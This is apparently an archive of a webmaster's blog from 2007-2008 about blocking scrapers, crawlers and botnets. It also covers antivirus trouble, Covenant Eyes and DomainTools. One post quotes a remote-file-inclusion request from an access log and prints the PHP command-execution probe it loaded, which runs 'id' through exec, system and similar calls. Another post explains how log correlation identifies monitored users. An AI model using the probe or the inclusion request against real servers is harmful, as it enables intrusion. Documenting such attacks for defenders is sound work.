Having the Sprint Broadband backup is definitely not a cheap solution but it's saved my ass a few times and now I no longer need to chase Wifi hotspots when I'm on the road. If you can afford the extra $60/month for internet connection redundancy I highly recommend getting a Sprint Broadband card or an equivalent from other providers. I'll think I'll stick with Sprint until something better and faster comes along in my area!

Friday, January 18, 2008

Botnet Whacks ROBOTS.TXT File

Just when you think having your server hacked is bad enough, these idiots start messing with your robots.txt file.

Here's an example:

83.133.96.246 "GET //errors.php?error=http://www.thefalife.com/robots.txt??? HTTP/1.0" "libwww-perl/5.48"
What did that robots.txt contain?
<?php
echo "549821347819481
";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd."
";
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;
Looks like botnets are now OK with messing up your search engine positions as well as messing up your server.

Just imagine that all the pages or images you have blocked are suddenly crawled.

Then imagine that every junk crawler you've denied is suddenly crawling all over your site.

It could take months or years to clean up the damage, if ever.

Fun, huh?

Friday, January 11, 2008

Defective Norton AV Dumped for Avast, PC Runs Better!

Before you start hammering on me about Norton Anti-Virus being crappy bloatware, I already knew that, but it came pre-installed with the machine, never caused a problem other than a little slowness now and then, so just using it was easier that installing something new.

However, a couple of days ago Norton AV puked when I rebooted the machine and all bets were off.

Norton AV claimed that something Norton needed was no longer registered and directed me to some auto-fix located on their website. The auto-fix was a piece of shit, got a couple of web errors trying to use it. Finally, it was downloaded and ran but coughed up an error at the end telling me to run it again. Ran it again and it said it was installed properly and I should reboot. Rebooted the machine and it said the same shit wasn't registered and the same auto-fix said it was fixed.

I hate this fucking shit.

OK, fine, let's just uninstall and re-install Norton, that should fix the problem.

Yup, that error was fixed but I got 2 new ones in it's place.

FUCK!

OK, managed to resolve those errors and now Norton seems to be running fine.

Seems to be running fine is the operative phrase here.

Part of the Live Update won't update, keeps spiking the CPU and memory consumption, it's out of control. Tried to fix it to no avail because it seems that the file it downloaded to update just won't install properly so it's fucked and it locks up the machine trying to install it meaning I'm fucked when it's running.

To be quite blunt, I simply got tired of fucking with it at this point.

Simple solution, BYE BYE NORTON!

I use AVG on another machine and it's OK but I thought I'd give Avast a try this time.

Downloaded Avast and installed without a hitch, smooth sailing, no bullshit.

The best part is, Avast loads and runs faster so now my PC boots quicker and runs faster overall.

No more bloated Norton AV ever again and if Avast keeps working this good they'll keep my business.

Thursday, January 10, 2008

Scraping South of the Border

Never really had much of a problem with scrapers from Mexico before but today one came bouncing through Megared's proxy server:

200.52.167.3 [customer-CLN-167-3.megared.net.mx.] requested 11 pages as "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

200.52.167.8 [customer-CLN-167-8.megared.net.mx.] requested 156 pages as "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

200.52.167.4 [customer-CLN-167-4.megared.net.mx.] requested 31 pages as "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

200.52.167.9 [customer-CLN-167-9.megared.net.mx.] requested 36 pages as "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
They were just speeding through read fast asking just for pages, nothing else, the typical scraper.

Not much you can do about proxy servers and IP pools without punishing the innocent except set it to challenge all future accesses but that's a bit extreme for a single instance.

It's not like the crazy shit that comes from airtelbroadband.in, but that's a different blog post.

Tuesday, January 08, 2008

Harry Down Under

Something calling itself "Harry" has been hitting one of my sites since June '07 and seems to hit for a couple of days, go away a week or two, come back, repeat and rinse as needed.

Here's what Harry TRIED to do today:

203.6.205.34 - "GET /contact.html" 301 "Harry"
203.6.205.34 - "GET /contact.html" 200 "Harry"
203.6.205.34 - "GET / " 301 "Harry"
203.6.205.34 - "GET / " 200 "Harry"
203.6.205.34 - "GET /robots.txt" 301 "Harry"
203.6.205.34 - "GET /robots.txt" 200 "Harry"
Did you notice Harry stutters?

That's because he keeps asking for my domain without the WWW so he gets a redirect and then hits the bot blocker head on.
203.6.205.34 [203-6-205-34.reed-elsevier.com.au.]
Now that you know Harry is an Aussie the title will make more sense. ;)

Needless to say, I'm NOT just wild about Harry.

Bot Blockers Beware! New UK Threat!

When I saw this in my bot blockers' log today it sent shivers down my spine.

What evil genius came up with this?

217.206.231.140 "fake_user_agent Mozilla/9.0 (compatible; MSIE)"
I'm not sure we can stop this one...

French Speaking Scrapers Needed - Apply Within

This morning I found this little French gem sitting in the bot blockers' Inbox direct from optioncarriere.com which appears to be a crawler looking for job listings.

First they tried libwww:

193.238.230.109 "GET / " "libwww-perl/5.805"
193.238.230.109 "GET / " "libwww-perl/5.805"
193.238.230.109 "GET / " "libwww-perl/5.805"
193.238.230.109 "GET / " "libwww-perl/5.805"
Sacrebleu! Zee LEEB WWW duz not wurk!

VITE! VITE! Youze zee Mozeeluh!
193.238.230.109 "GET / " "Mozilla/5.0 (compatible)"
Merde!

Sunday, January 06, 2008

Active Web Reader Causes IEAutoDiscovery Hell

Installed this RSS feed reader called Active Web Reader on the Vista laptop the other day and it went off hammering my server with requests from "IEAutoDiscovery" that resembled a fucking DoS on one of my websites.

At first I thought I'd just been fucked over with malware in the download until I remembered what it said on their web site:

"Active Web Reader has a unique feature, called Auto Discovery, that automatically discovers RSS feeds while you browse the Internet using Internet Explorer."
Auto Discovery my ass, this is Auto Denial of Service attack!
xx.xx.xx - - [17:53:40] "GET /somepage.html" "IEAutoDiscovery"

... shitload of requests sometimes hitting 2 and 3 pages per second

xx.xx.xx - - [18:31:17] "GET /somepage.html" "IEAutoDiscovery"
Maybe it malfunctioned in Vista, who knows, because I've never seen IEAutoDiscovery run amok like this before, but in less than 40 minutes this fucking thing pulled down 647 pages when the site has less than 50. That means this tool kept hammering the same pages over and over and over, ever hear of the word CACHE?

Fuck me.

Uninstalled and I'll never touch anything from them again.

Saturday, January 05, 2008

Why The Hell Is Bloglines Crawling?

Let's start this investigation by noting that Bloglines themselves claim to be a crawler now when you use reverse DNS on their IP address:

65.214.44.29 -> crawler.bloglines.com
This is what Bloglines is supposed to do, read your RSS feed:
65.214.44.29 "GET /rss_feed.xml" "-" "Bloglines/3.1 (http://www.bloglines.com;XXX subscribers)"
However, they've stepped off the RSS path and started coloring outside the lines!

The first off thing I noticed was it asked for robots.txt without any user agent defined:
65.214.44.29 "GET /robots.txt" "-" "-"
So I dug a little deeper and it appears they are running Firefox Minefield which was asking for a bunch of images from 3rd party websites where my graphic appears:
65.214.44.29 "GET /myimage.gif" "http://someotherwebsite.com/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
Finally, I found them requesting some web pages that are NOT in any RSS feed, what the fuck?
65.214.44.29 "GET /anyoldpage.html" "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
So, anyone have a clue what they're doing?

SCREENSHOTS!

Yes, they're making screen shots that appear on ASK.com!

I looked up a few pages from one of my sites in ASK and sure enough, instead of screen shots of the actual web pages there were screen shots of error messages with the Bloglines IP address of 65.214.44.29 in big bold numbers.

The reason I figured that out so easily was I recently decided to just block everything claiming to be coming from Linux just to see what came up and that's why they got an error page instead of a screen shot. Sure, I'm probably blocking a few innocent Linux users as well but they account for an insignificant part of my traffic and overlap with the same tools that servers use so sacrifices were made.

Anyway, what we've learned is that Ask is using Bloglines' IP to make screenshots and look at your robots.txt file yet they don't disclose what they're even looking for in your robots.txt file.

Wasn't that fun?

Friday, January 04, 2008

Does Covenant Eyes Divulge Their Members?

While monitoring activity from Covenant Eyes on one of my servers it became obvious that many of the pages being accessed were fairly unique, not as popular, and easily allowed me to figure out the actual customer Covenant Eyes was watching.

To test my theory I checked the log file for one unique page Covenant Eyes requested and sure enough only a single IP had accessed that file during the course of the day.

Then I got a list of all files that this visitor's IP had viewed and compared it to all the files that Covenant Eyes requested and it was an exact match in the exact same order of access, without any obfuscation, so it was a 100% match without a doubt.

I've been monitoring this situation for several days now and it's always the same.

The visitor comes and views some pages and about 90-120 minutes later Covenant Eyes comes and asks for the exact same pages in the exact same order.

Here's a sample of a visitor's access:

127.0.0.1 "justapage.html"
127.0.0.1 "anyoldpage.html"
127.0.0.1 "justanotherpage.html"
127.0.0.1 "veryspecialpage.html"
127.0.0.1 "anotherrandompage.html"
A while later Convenant Eye's asks for the same pages in the same order:
69.41.14.x "justapage.html"
69.41.14.x "anyoldpage.html"
69.41.14.x "justanotherpage.html"
69.41.14.x"veryspecialpage.html"
69.41.14.x "anotherrandompage.html"
Same pages, same order, definite match with a unique page like "veryspecialpage.html" that nobody else visits on the same day. Additionally, they appear to do each customer's files they monitor very quickly in a batch so it's pretty easy to see that those files are related to a single visitor making identification even simpler.

Now with a simple script I can find out who they were monitoring with extreme accuracy as long as the visitor looked at more than one page unless that one page was unique and nobody else looked at that page during the day.

Making it harder to identify which visitor they're monitoring wouldn't be that difficult just by staggering and randomizing their page requests over the course of the day. However, I still don't see how you could protect the identity of your customer if that was the only customer of the day that accessed that web site unless you throw in a few bogus page requests to throw a webmaster off the trail. Even with randomization and fake page requests you would still have a problem if that customer was the only one to access a specific page as mentioned above, but at least it would be a start in making the monitoring activity just a little more covert and possibly less traceable.

The site of mine where I did this experiment, which isn't this blog, gets from 20K-40K visitors daily, so if I can easily find a needle in that big haystack then it would be trivial on a low traffic site.

Tuesday, January 01, 2008

Romanian Scrapers Go Apeshit on New Years Day

The stealth scrapers attempting to hit my site have been really laid back lately but on Jan 1 '08 the Romanian scrapers went apeshit, or at least tried, followed by a few others.

Needless to say, the bot trap was very busy today.

So far today this is what the little Romanian fuckers tried:

89.122.29.31 requested 333 pages as "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

89.122.16.96 requested 336 pages as "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

89.122.29.35 requested 337 pages as "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

89.122.29.32 requested 336 pages as "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
Then someone from Vietnam tried to join the fun:
203.162.3.153 requested 340 pages as "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
A quick visit from the Ivory Coast:
41.207.2.87 [host-41-207-2-87.afnet.net.] requested 339 pages as "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
Then maybe a human with issues...

Someone from Venezuela gave a quick visit with what appeared to be a broken browser that asked for a bunch of pages that the visitor probably wasn't aware happened:
201.210.138.88 [201-210-138-88.genericrev.cantv.net.] requested 153 pages as "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
Every time the browser would ask for a page it would then ask for the home page about 5-10 times in just a few seconds, what the fuck is up with that?

Anyway, it was considered an automated attack, fuck it.

Anyone else have a wild scrape attack today?

How to Identify Screen Shot Makers

Have you ever wondered how I figure out where screen shots originate from?

My trick of the trade is the SPARE DOMAIN!

All my unused domain does is print out information about whoever or whatever just visited the site with the IP address in REALLY BIG BOLD LETTERS so it's easy to read on a small screen shot thumbnail.

Therefore, if someone makes a screen shot I can tell who's doing it just by looking at the screen shot and block them from doing it a second time if I don't like what they're doing with thumbnails of my site.

DomainTools Whois and AboutUs Site Accesses Revealed

The DomainTools Whois is now collecting and displaying more information than ever about our web sites. Their Whois display used to be limited mostly to public registration information such as Whois, the IP address, where you host and the basics. Then DomainTools expanded Whois a while back and started taking data straight from our domains without permission and doesn't even look at robots.txt to see if we want to participate. The screen shots were no big deal but then they added some SEO text browser that allows people to snoop on your site and who knows what's next.

If that wasn't enough, then along came their Wiki companion site AboutUs.org, which scraped off some data as well. AboutUs does seem to use robots.txt, see backwards robots access below, but by the time you find out about the bot it's too late because you already have scraped content on your domain's AboutUs Wiki page.

Enough is enough, it's official, I'm annoyed.

Since I could find no way to "opt-out" of all the new toys on DomainTools Whois I decided it was time to opt-out the old fashioned way and just block 'em.

If they had just identified themselves in the User Agent this would've been easy because those are all monitored on my main site automatically. However, it appears that DomainTools either doesn't know how to put their information in the User Agent field for the tools they use, or they really don't want to get snared and stopped easily, because they use standard Firefox and MSIE user agents for accessing your site.

However, note that the referrer does claim that it's coming from DomainTools so you can at least use that as an indication it's them although the User Agent field would've been preferred since it is the standard for this sort of thing.

Here's a sample of DomainTools SEO Text Browser hitting your server:

66.249.16.212 "GET /" "http://whois.domaintools.com/somedomainname.com" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
The SEO Text Browser thing looks like it might be telling the webmaster who's snooping on their site because I caught it claiming to be a proxy that was forwarding information for my IP address when I was looking at the site so using it is far from anonymous!

66.249.16.211 "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "/" Proxy Detected -> VIA=1.1 www.domaintools.com FORWARD=aaa.bbb.ccc.ddd

Of course your average webmaster would never see this proxy information because it's not in your default log file, but I log proxy details and a whole lot more.

This is the DomainTools screen shot thumbnail generator hitting your site:

64.246.165.237 "GET /" "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; {E12EDDF0-EE40-C76D-85D0-8861BDE2E7AE}; SV1; .NET CLR 1.1.4322)"

Here's their companion site AboutUs.org which claims it uses robots.txt but didn't bother to check if I allowed them on my site until AFTER they had already been to the site as the access was in exactly the order shown below.

66.249.16.207 "GET /" "-" "Mozilla/5.0 (compatible; AboutUsBot/0.9; +http://www.aboutus.org/AboutUsBot)"

66.249.16.207 "GET /robots.txt" "http://www.somedomainname.com/" "Mozilla/5.0 (compatible; AboutUsBot/0.9; +http://www.aboutus.org/AboutUsBot)"

You might want to block AboutUsBot unless you want them to freely license whatever shit they scrape off your site with the claims on the bottom of their site:
All content is available under the terms of the GFDL and/or the CC By-SA License
If you want to keep them from snooping your site the IPs I'm currently blocking are:
66.249.16.*
66.249.17.*
64.246.165.* (screen shots)
So there's all I know at this time, you have robots.txt and htaccess files, you know what to do.

UPDATE:

They are also running screenshots from 216.145.16.*
Wonder how many other blocks of IPs they're using?

UPDATE UPDATE:

I was accused of confusing DomainTools and AboutUs.org!

I was never confused but whoever posted that I was confused apparently is just because I lumped them together because they operate from the same IP space, their whois records have the same address, and they have some shared data in common such as the thumbnails.

AboutUs uses the thumbnails from DomainTools and DomainTools Whois has a link from every domain to "AboutUs: Wiki article on ..." what would you call them?

I never said they were the same company, totally not confused, but whatever makes you happy.

UPDATE UPDATE UPDATE:

I knew the connections would be spelled out somewhere on the 'net when I had a little more time to do some snooping on the site.
One of the questions posed was about our connection with Name Intellignece. Jay Westerdal, CEO of NameIntelligence.com, in fact, recently stepped down as AboutUs CTO...
Confuse THAT!

Monday, December 31, 2007

How Much Nutch is TOO MUCH Nutch Revisited

To date there have been 585 unique IPs hitting my server since I started tracking this nuisance called nutch.

Here's a list of IPs with nutch sightings to date:

12.47.49.97
13.1.137.86
13.1.139.202
13.1.139.205
13.1.139.206
13.1.139.211
13.1.139.212
13.1.139.213
15.203.249.124
24.12.140.54
24.222.153.250
24.231.207.219
24.247.204.244
24.5.71.1
24.6.168.184
24.94.62.119
35.10.2.90
58.186.61.164
58.187.12.236
58.187.22.230
58.215.74.242
58.215.74.253
58.215.75.2
58.68.42.138
58.87.139.90
59.160.240.115
59.160.240.116
59.160.240.183
59.160.240.184
59.160.240.185
59.176.10.136
60.248.9.114
61.135.151.175
61.246.2.241
61.8.140.20
62.129.132.47
62.168.188.151
62.192.109.66
62.192.11.2
62.40.33.173
62.40.36.87
62.54.4.138
63.133.162.98
63.246.7.209
63.82.23.2
64.105.36.210
64.106.247.178
64.18.197.136
64.209.138.200
64.229.206.25
64.229.222.170
64.229.226.126
64.229.33.51
64.231.233.162
64.236.128.27
64.241.242.18
64.242.88.10
64.242.88.60
64.34.172.78
64.34.180.167
64.38.10.26
64.47.51.158
64.71.164.125
65.120.64.146
65.220.67.9
65.92.160.39
65.95.155.163
66.132.240.180
66.132.249.23
66.135.44.34
66.135.44.35
66.135.44.36
66.135.44.37
66.135.44.38
66.135.44.39
66.135.44.40
66.135.44.41
66.135.44.42
66.135.44.43
66.135.44.44
66.135.44.46
66.135.44.48
66.135.44.49
66.135.44.50
66.135.44.51
66.135.44.52
66.135.44.53
66.15.68.234
66.207.120.226
66.24.192.59
66.24.198.171
66.24.199.39
66.24.240.206
66.243.31.34
66.30.10.222
66.92.153.138
67.110.56.45
67.110.58.2
67.111.28.139
67.184.246.61
67.202.20.30
67.202.49.49
67.202.6.11
67.52.101.242
67.68.42.2
67.70.155.226
67.71.89.27
67.95.51.86
68.178.171.109
68.178.202.79
68.205.124.164
68.205.127.94
68.228.72.198
68.97.222.117
69.248.26.83
69.36.233.8
69.55.233.28
69.60.125.233
69.90.45.7
69.93.236.178
70.143.79.234
70.187.130.253
70.197.81.79
70.21.122.162
70.48.46.56
70.50.75.8
70.56.66.216
70.62.103.114
70.85.198.178
70.87.14.34
70.90.188.18
70.96.99.254
71.216.0.210
71.217.33.149
71.241.153.125
71.35.163.79
71.98.182.170
72.0.207.162
72.2.25.66
72.2.25.67
72.2.25.71
72.21.6.146
72.21.6.147
72.21.6.148
72.232.202.50
72.232.223.234
72.232.228.58
72.233.38.194
72.233.38.195
72.233.38.196
72.233.38.197
72.36.114.145
72.36.114.147
72.36.115.42
72.36.115.45
72.36.115.47
72.36.115.52
72.36.115.53
72.36.115.54
72.36.115.56
72.36.115.57
72.36.115.59
72.36.115.64
72.36.115.65
72.36.115.68
72.36.115.69
72.36.115.70
72.36.115.72
72.36.115.73
72.36.115.74
72.36.115.77
72.36.115.79
72.36.115.80
72.36.94.100
72.36.94.106
72.36.94.107
72.36.94.109
72.36.94.110
72.36.94.112
72.36.94.113
72.36.94.118
72.36.94.119
72.36.94.121
72.36.94.122
72.36.94.123
72.36.94.124
72.36.94.169
72.36.94.173
72.36.94.176
72.36.94.179
72.36.94.181
72.36.94.182
72.36.94.20
72.36.94.201
72.36.94.203
72.36.94.243
72.36.94.38
72.36.94.39
72.36.94.48
72.36.94.50
72.36.94.52
72.36.94.54
72.36.94.56
72.36.94.60
72.36.94.61
72.36.94.68
72.36.94.90
72.36.94.92
72.36.94.96
72.36.94.99
72.36.95.12
72.36.95.131
72.36.95.134
72.36.95.145
72.36.95.146
72.36.95.147
72.36.95.148
72.36.95.149
72.36.95.150
72.36.95.152
72.36.95.154
72.36.95.155
72.36.95.156
72.36.95.157
72.36.95.158
72.36.95.160
72.36.95.161
72.36.95.162
72.36.95.165
72.36.95.166
72.36.95.167
72.36.95.168
72.36.95.170
72.36.95.173
72.36.95.176
72.36.95.177
72.36.95.178
72.36.95.179
72.36.95.183
72.36.95.185
72.36.95.207
72.36.95.209
72.36.95.212
72.36.95.214
72.36.95.217
72.36.95.218
72.36.95.226
72.36.95.227
72.36.95.230
72.36.95.231
72.36.95.232
72.36.95.236
72.36.95.237
72.36.95.238
72.36.95.239
72.36.95.251
72.44.58.104
72.44.58.167
72.44.58.173
72.44.58.244
72.44.58.252
72.44.62.107
72.44.62.122
72.44.62.124
72.44.62.151
72.44.62.162
72.44.62.166
72.44.62.197
72.44.62.199
72.44.62.208
72.44.62.245
72.5.173.12
72.5.173.22
72.51.37.148
72.84.30.230
74.111.22.20
74.111.7.226
74.208.11.120
74.39.192.237
74.52.54.130
74.69.164.2
74.98.30.178
74.98.32.176
75.126.142.100
75.126.204.194
75.44.225.44
80.38.119.131
80.79.35.55
81.173.148.94
81.173.155.210
81.203.142.109
81.67.169.232
81.93.168.211
82.150.138.138
82.150.138.139
82.16.40.198
83.149.77.7
83.246.79.28
84.101.58.177
84.101.58.70
84.191.111.92
84.231.72.32
84.231.74.47
84.57.138.191
85.117.62.114
85.145.108.135
85.17.184.39
85.17.184.41
85.177.142.252
85.179.194.32
85.179.196.134
85.18.14.22
85.214.83.174
85.52.193.36
85.88.35.34
85.88.35.35
85.88.35.37
85.88.35.41
87.139.106.60
87.233.142.106
87.242.77.169
87.69.22.130
87.98.222.116
88.191.23.109
88.198.212.50
88.74.95.48
89.149.208.224
89.31.118.248
123.113.184.253
124.157.145.165
124.32.246.36
124.32.246.45
128.174.240.249
128.174.240.251
128.174.241.130
128.174.245.163
128.208.1.160
128.208.3.173
128.208.4.10
128.208.6.125
128.208.6.200
128.208.6.207
128.208.6.226
128.208.6.227
128.208.6.232
128.208.6.75
128.208.6.77
128.238.35.93
128.95.1.189
128.97.88.68
128.97.88.70
129.242.19.138
129.34.20.19
129.78.64.106
131.112.125.102
131.112.125.103
131.112.125.104
131.112.125.106
131.112.16.220
131.211.84.21
132.178.248.36
132.178.248.47
133.30.112.143
140.247.62.79
140.247.62.80
141.30.193.12
141.30.193.5
141.30.193.6
144.92.194.22
145.99.243.67
147.202.73.2
147.202.74.2
147.202.76.2
147.202.81.2
147.202.90.2
159.226.5.82
164.67.195.201
164.67.195.245
164.67.195.26
164.67.195.27
164.67.195.67
164.67.195.68
164.67.195.86
166.214.93.76
192.17.240.18
192.17.240.19
192.17.240.20
192.17.240.21
192.17.240.22
192.17.240.25
192.17.240.26
192.17.240.27
192.17.240.28
192.17.240.29
192.17.240.30
192.17.240.32
192.17.240.33
192.17.240.34
192.17.240.36
192.17.240.41
192.17.240.42
192.17.240.43
192.17.240.44
192.17.240.45
192.17.240.46
192.17.240.47
192.17.240.48
192.17.240.50
192.17.240.52
192.17.240.53
192.17.240.54
192.17.240.55
192.17.240.56
192.17.240.57
192.17.240.58
192.17.240.59
192.17.240.60
192.17.240.62
192.17.240.65
192.17.240.71
192.17.240.73
192.17.240.74
192.17.240.76
192.17.240.79
192.17.240.81
193.138.250.141
193.138.250.237
193.145.45.68
193.203.240.117
193.203.240.118
193.203.240.119
193.203.240.120
193.203.240.121
193.203.240.122
193.203.240.135
193.205.213.166
193.252.148.51
193.42.229.3
193.42.84.5
194.153.145.119
194.153.145.15
195.250.53.25
195.72.131.70
195.72.131.71
195.72.131.72
195.72.131.73
195.72.131.74
195.72.131.75
195.72.131.76
195.72.131.77
195.72.131.78
195.72.131.79
195.72.131.80
195.72.131.81
195.72.131.82
195.72.131.85
195.72.131.86
195.72.131.87
195.72.131.88
195.72.131.89
195.72.131.90
195.72.131.91
195.72.131.92
195.72.131.93
196.203.50.219
198.87.235.130
198.87.235.142
199.4.160.10
200.152.240.214
202.10.82.98
202.174.61.198
202.20.190.235
202.20.192.195
202.69.141.20
202.98.1.120
203.113.130.205
203.147.0.44
203.199.83.162
203.244.218.1
204.123.46.105
204.123.47.91
204.228.230.38
204.228.230.43
206.222.21.2
206.222.9.122
207.115.108.202
207.176.224.241
207.176.224.244
207.176.224.245
207.214.93.42
208.109.126.135
208.64.57.65
208.96.10.200
208.96.10.201
208.96.54.71
208.96.54.72
208.96.54.73
208.96.54.76
208.96.54.77
208.96.54.79
208.96.54.80
208.96.54.81
208.96.54.82
208.96.54.83
208.96.54.84
208.96.54.85
208.96.54.86
208.96.54.88
208.96.54.89
208.96.54.90
208.96.54.91
208.96.54.95
209.139.209.220
209.139.209.224
209.51.212.10
209.51.212.18
209.51.212.26
209.85.62.159
209.85.62.162
209.85.88.150
210.174.3.130
210.196.73.193
210.245.31.15
210.245.31.18
211.152.34.34
212.101.97.63
212.12.114.238
212.137.33.140
212.156.230.210
212.166.192.129
212.174.130.121
212.174.130.122
212.58.116.72
213.132.171.245
213.132.175.101
213.157.204.141
213.219.170.12
213.251.133.12
216.163.188.200
216.163.188.201
216.182.225.186
216.182.229.37
216.182.229.39
216.182.229.91
216.182.230.40
216.182.230.54
216.182.230.75
216.182.236.46
216.182.236.77
216.182.237.45
216.182.238.83
216.231.36.92
216.24.131.152
216.58.87.217
216.93.185.12
217.10.144.242
217.106.233.192
217.153.59.26
217.31.51.128
217.80.112.146
218.25.39.81
220.130.191.231
220.130.191.232
220.130.191.233
220.130.191.234
220.130.191.235
220.130.191.236
220.130.191.237
220.130.191.238
220.130.191.239
220.130.191.240
220.226.195.162
220.226.195.163
220.226.195.165
220.226.195.166
220.226.195.167
220.226.195.168
221.114.253.210
221.116.237.114
221.221.140.114
221.221.237.35
222.173.249.33
222.210.196.26
222.46.17.43
222.46.17.47
If I weren't blocking nutch my server would probably be down in flames from the nutch DDoS.

Nothing dangerous about giving away code, not a thing.

Saturday, December 22, 2007

Covenant Eyes Needs Accountability

Here's yet another company making money from hitting your server without permission.

This one is an online service called Covenant Eyes that has a Net Nanny type of service that's been hitting one of my sites for ages. Over time they have requested thousands of pages, never got anything but an error message, but always keep trying using a blank user agent.

They operate from this range of IP's:

Covenant Eyes, Inc MOG-69-41-14-0 (NET-69-41-14-0-1)
69.41.14.0 - 69.41.14.127
Yesterday they suddenly started using this user agent after years of being blank:
69.41.14.83 "libcurl-agent/1.0"
The website claims:
Covenant Eyes Software provides Internet Integrity with accountability reports.
I guess it depends on who defines "Internet Integrity" or "accountability" because I personally don't find much integrity or accountability in hiding why you're hitting my website behind blank user agents or some default user agent.

The site also claims:
A church in town lost it's pastor to porn...
Which brings up the point that any rogue webmaster could cloak very bad content to Covenant Eyes and think it's funny to get someone in trouble that has an "accountability report" sent to a boss, spouse or parent so I hope someone checks to make sure these reports are accurate before punishing someone.

IMO blocking 69.41.14.* should stop their members from being "tempted" to visit your sites.

Wednesday, December 19, 2007

Snared Human Claims "I Ain't No Bot!"

When you snare a human in your bot trap they might be a little feisty and squirm a little. Those snared humans may even send you a scathing email claiming complete innocence, your tools are broken, bad bot blocker, BAD!

Amazing that his tool appears to be the one broken, not mine!

I nicely replied to this snared human and asked if he could explain why he downloaded a couple of hundred pages in just a few minutes, many of them the same page over and over and over again, sometimes several per second.

Sorry Mr. Human but your browser exhibits the same behavior as one of those high speed scrapers that have attacked me in the past and you were shut down for behaving badly.

I suspect he has PRE-FETCH enabled which is amusing because I have PRE-FETCH disabled server-side, so if he has it enabled it didn't identify itself as PRE-FETCH which is why he was snared.

Oh boo hoo, guess you'll just have to go waste someone else's bandwidth using that stupid browser that keeps downloading the same pages as fast as it can download them.

I won't miss you and don't let the door hit you on the way out.

Monday, December 17, 2007

Yahoo! Ignorance Shines in ShoeMoney Reputation Attack

Q: What do you do when your payment processing anti-fraud detection doesn't work?

A: It appears you fire your referring affiliate if your name is Yahoo!

That's right boys and girls, according to ShoeMoney the nitwits at Yahoo! obviously can't detect a fraudulent transaction and then blame someone who's under fire with a blatant reputation attack.

Now Yahoo! Stores and other properties do a lot of payment processing so they should have a ton of historical data, potentially from valid uses of the stolen credit cards themselves, so wouldn't you think with all this information they could flag a few fraud sales?

Apparently not.

OK, even if you don't have any historical data on the customer there are a few things you can do to easily combat what appears, based on the volume of transactions, to be automated fraud short of firing one of your affiliates.

1. Validate the account with email confirmation BEFORE processing the credit card in a 2 step process known as AUTH and BOOK. You pre-authorize the sale first, setting aside the money until you're sure the sale is valid and then BOOK the sale after the fact.

2. Require that the account creation and/or checkout page use several forms of automation blocking such as javascript and/or some form of captcha.

3. Obviously use full AVS (Address Verification) and require CSC / CVV2 (Credit Card Security Code) to make sure everything is OK per the credit card company.

4. Use GeoIP services to check that the IP address placing the order is even close to the actual address on the order and if not, flag it for human review before processing.

5. Do some basic IP blocking and restrict access to those account creation pages from hosting data centers, lists of known proxy servers, botnets and spammers.

There's a couple of other steps I'd take as well, but if someone could get past the 5 steps above without anything tripping at least one alarm for human review, I'd be shocked. Even if it was a human manually performing the attack the GeoIP should indicate a problem unless Yahoo just ignores it.

The only thing that cracks me up is ShoeMoney wanted to know what the referring URLs were and it's meaningless because the referring URL can be easily spoofed or blocked so it's a useless piece of information.

Consider that whoever did this only needed to visit your site one time to get your affiliate code and then using automation abuse it over and over again without ever visiting your site a second time and claiming in the referrer to be always coming from your site.

Cute huh?

Better yet, they didn't have to visit your site EVER because you allow your pages to be cached in the search engines so anyone could get your affiliate code directly from the search engines without leaving a trail on your website.

I've been preaching about using the meta "NOARCHIVE" for years now and this is just another reason to use it, but nobody listens and I digress...

Just to prove that the Michelle from Yahoo! was completely clueless about how internet fraud works she asked ShoeMoney to do the following:

I wanted to give you a heads up in advance to see if there was anyway you could filter or prevent fraudulent users from coming through your website/links. If so, we’d like to continue our partnership.
The odds are very high that this activity isn't passing through ShoeMoney's site whatsoever, even if it's being done manually, because they don't want to leave a trail that's too obvious.

Sorry to see you get the boot Shoe (punny) but it would appear that Yahoo! doesn't mind making a public spectacle of their shortcomings and now it's open season on YSM thanks to them admitting they can't tell a fraud transaction.

This should be loads of fun to see what happens next.

Monday, December 10, 2007

Block List Babelfish Desperately Needed

After spending a few days trying to come up with a more comprehensive method of identifying known pre-existing bad IPs using the existing block lists it has become quite maddening.

SpamHaus has their collection criteria which comes up with one set of BL results, ProjectHoneyPot has their methods and even different results, and so on and so forth. Then I have my methods which traps IPs that may intersect those BL's but quite often cough up brand new IPs not showing in the other BLs for spammers and scrapers. Collectively all of these BLs, including my own, are quite comprehensive but unfortunately there's no easy way to combine them all in a real-time manner that makes sense.

Sadly, the current state of affairs is that there are just too many independent services to use that makes the process overwhelming for the average webmaster which probably opts just to pick one, which would let things slip through the cracks, out of frustration. Picking block list A over block list B might be the difference between your server getting hacked just because one list knew about the malicious botnet IP and the other list didn't.

